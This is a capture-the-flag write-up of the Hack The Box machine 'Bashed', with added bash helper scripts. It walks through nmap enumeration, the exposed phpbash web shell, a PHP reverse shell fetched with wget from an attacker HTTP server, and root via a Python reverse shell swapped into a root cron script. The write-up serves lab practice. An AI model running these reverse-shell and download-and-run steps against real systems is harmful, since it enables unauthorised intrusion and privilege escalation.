Bashed is rated easy on HTB, so I thought I would do it without any help from the internet. I failed, but it clarified many concepts along the way.
Let me share what I learned while exploiting the box without Metasploit.
A simple bash script that uses Nmap to enumerate the host.
Don’t forget to give executable permission to the script.
chmod +x en.sh
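As an added example in the spirit of the en.sh the post mentions (the post's own script is not reproduced here), this is the kind of wrapper I would use: a fast sweep of all TCP ports, then default scripts and version detection only against what came back open. The target address and output directory are arguments, nmap is assumed to be installed, and the parser assumes nmap's greppable (-oG) line format.

```bash
#!/usr/bin/env bash
# Added example in the spirit of the en.sh the post mentions (the post's own
# script is not reproduced here). Assumes nmap is installed; the target and
# output directory are arguments. parse_open_ports only needs awk, so it can
# be exercised offline on a constructed -oG line.
set -u

# parse_open_ports: read nmap greppable (-oG) output on stdin and print one
# "port/proto service version" line per open port. -oG fields are tab
# separated; each port entry is port/state/proto/owner/service/rpc/version/.
parse_open_ports() {
    awk -F'\t' '
        /Ports:/ {
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, ports, /, /)
                    for (j = 1; j <= n; j++) {
                        split(ports[j], f, "/")
                        if (f[2] == "open")
                            printf "%s/%s %s %s\n", f[1], f[3], f[5], f[7]
                    }
                }
            }
        }'
}

# enumerate TARGET [OUTDIR]: sweep all TCP ports quickly, then run the
# default scripts and version detection only against what was open.
enumerate() {
    local target="$1" outdir="${2:-nmap}"
    mkdir -p "$outdir"
    nmap -p- --min-rate 1000 -oG "$outdir/all-ports.gnmap" "$target" >/dev/null
    local ports
    ports=$(parse_open_ports < "$outdir/all-ports.gnmap" | cut -d/ -f1 | paste -sd, -)
    [ -n "$ports" ] || { echo "no open TCP ports found on $target" >&2; return 1; }
    echo "open: $ports"
    nmap -sC -sV -p "$ports" -oA "$outdir/services" "$target"
}

# Usage: ./en.sh TARGET_IP [outdir]   (TARGET_IP is a placeholder)
[ $# -eq 0 ] || enumerate "$@"
```

Running the version scan only against confirmed-open ports keeps the noisy part short; on this box the sweep should come back with just 80/tcp.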
Points to consider:
- Only one open port: 80/tcp, Apache httpd 2.4.18.
- The page title is “Arrexel’s Development Site”.
- With only a web server exposed, the natural next step is directory brute-forcing (dirbuster/gobuster) and nikto.
Let’s visit the site first.
phpbash is definitely a hint to move forward. I don’t know what it is yet… :[ But the description says it helps with pentesting and is generally present on servers, and it is present here too.
Let’s enumerate further with DirBuster. Meanwhile, let’s look phpbash up on the internet.
This is what I found in the official git repository: phpbash is a standalone, semi-interactive web shell written in PHP, meant for penetration tests where a normal reverse shell is not available. In other words, a web shell dropped on a web server for testing purposes.
If you are interested in learning more about web shells, see https://www.hackingarticles.in/web-shells-penetration-testing/
We will look for phpbash.php or phpbash.min.php in our DirBuster results.
Set the number of threads to 20, 30 or more, depending on your machine’s hardware.
For the file with the list of dirs/files, click Browse and select “/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt”.
You can use any other list you like; I am using the one mentioned above.
As I always say, it is a good habit to set file extensions whenever DirBuster is used.
Here it will look for .php, .py, .sh and .txt files inside the directories it finds.
Several files to consider here:
- First of all, we got both phpbash.php and phpbash.min.php. (I had assumed the task would be to upload those files and exploit them, but they are already present.)
- sendMail.php appears to belong to an open-source email component.
- There is a folder called uploads; I expected a page for uploading stuff, but it is empty. (I also tried browsing to it manually, still empty.)
Let’s open phpbash.php in the browser.
It looks just like your Kali terminal, isn’t that great!
sudo -l shows that www-data may run commands as a user called scriptmanager without a password.
I did not think getting user.txt would be that easy; let’s go for root now.
We have already seen that www-data can switch to scriptmanager without a password, but there are several problems.
The shell we have is only semi-interactive: phpbash runs each command as a separate HTTP request, so anything that needs a real TTY, such as switching users and staying in that shell, does not work. Hence we need a full shell.
On researching, I found that Kali ships ready-made reverse shells for PHP (under /usr/share/webshells/php/, including php-reverse-shell.php), so let’s edit that script for our needs and run it from the phpbash shell.
Don’t forget to change the IP and PORT in the script to your attacker machine’s IP and a port of your choice.
To get the file onto the box, I fired up Python’s built-in SimpleHTTPServer on my machine to serve it over HTTP.
My first attempt to wget it from the phpbash shell failed: www-data cannot write into the web root. Only a few directories are writable by that user, one of which is /tmp, so download the file there.
Start netcat listening on the port you set in php-reverse-shell.php before running the script. In my case it is 1234.
nc -nvlp 1234
Then run the downloaded script from the phpbash shell.
That got a shell, but I noticed it was still not fully interactive. I also noticed a directory called scripts. Let’s learn to obtain a stable, interactive shell before going into that folder.
Using Python to upgrade the dumb shell:
python -c 'import pty; pty.spawn("/bin/bash")'
After that, sudo -u scriptmanager /bin/bash drops us into a proper bash shell as scriptmanager.
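Putting the whole sequence together, here is an added example (my own commands, not the post’s): patch Kali’s stock php-reverse-shell.php with the callback address, serve it over HTTP, and print the lines to paste into phpbash and then into the netcat session once it calls back. The attacker IP 10.10.14.5, the listener port 1234, the HTTP port 8000, the filename shell.php, and the use of the php command-line interpreter on the target to run the script are all assumptions; the template’s two “CHANGE THIS” lines are assumed to look as they do in the pentestmonkey original.

```bash
#!/usr/bin/env bash
# Added example (not the post's own commands): patch Kali's stock PHP reverse
# shell, serve it, and print the lines to paste into phpbash and into the
# netcat session afterwards. Assumptions: the template lives at
# /usr/share/webshells/php/php-reverse-shell.php and contains the two lines
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# the attacker IP/ports are placeholders, and the target has the php CLI.
set -u

# prepare_shell TEMPLATE OUT IP PORT: copy the template with the callback
# address patched in. Returns non-zero if the expected lines were not found.
prepare_shell() {
    local template="$1" out="$2" ip="$3" port="$4"
    sed -e "s|^[\$]ip = '[^']*';|\$ip = '$ip';|" \
        -e "s|^[\$]port = [0-9]*;|\$port = $port;|" "$template" > "$out"
    grep -qF "\$ip = '$ip';" "$out" && grep -qF "\$port = $port;" "$out"
}

# serve DIR PORT: expose DIR over HTTP so the target can wget from it
# (python2 equivalent: python -m SimpleHTTPServer PORT, as in the post).
serve() {
    local dir="$1" port="${2:-8000}"
    ( cd "$dir" && python3 -m http.server "$port" )
}

# target_commands IP HTTP_PORT: what to type into phpbash. /tmp is used
# because www-data cannot write into the web root.
target_commands() {
    local ip="$1" http_port="$2"
    cat <<EOF
cd /tmp
wget http://$ip:$http_port/shell.php
php /tmp/shell.php
EOF
}

# upgrade_commands: what to type in the netcat session once it calls back:
# spawn a pty so the shell behaves, then become scriptmanager via sudo.
upgrade_commands() {
    cat <<'EOF'
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -u scriptmanager /bin/bash
EOF
}

# Usage: ./getshell.sh ATTACKER_IP [LISTEN_PORT] [HTTP_PORT]
main() {
    local ip="$1" lport="${2:-1234}" hport="${3:-8000}"
    prepare_shell /usr/share/webshells/php/php-reverse-shell.php ./shell.php "$ip" "$lport"
    echo "1. in one terminal:   nc -nvlp $lport"
    echo "2. in another:        python3 -m http.server $hport   (from this directory)"
    echo "3. paste into phpbash:"; target_commands "$ip" "$hport"
    echo "4. in the netcat session:"; upgrade_commands
}
[ $# -eq 0 ] || main "$@"
```

The grep at the end of prepare_shell is the check I always want before serving a payload: if the template format ever changes, the sed does nothing and you would otherwise sit waiting on a listener for a callback to 127.0.0.1.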
Two files, test.py and test.txt, are found inside the scripts directory.
On closer inspection, test.txt is the output file generated by test.py.
But then who is executing test.py? (In such scenarios it is usually a cron job that runs the script.)
Secondly, test.txt is owned by root, so whatever runs test.py is doing it with root permissions.
Running ls -la again a little later shows the modification time of test.txt advancing, so the job fires every minute.
Let’s replace the contents of test.py with the Python reverse shell from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Don’t forget to update the IP and port number.
One thing I struggled with was editing test.py in place.
I don’t know why…
I found a workaround: I downloaded the root-shell script, deleted the original test.py and renamed the downloaded script to test.py.
Set up an nc listener on the port used in the script and wait a minute or less.
You can run the script manually to confirm the callback works, but that connection comes back as scriptmanager; the root shell with the “#” prompt only arrives once cron runs test.py as root.
Hey there, Root
I hope you found this helpful.
Please click the clap button if you learned anything new today.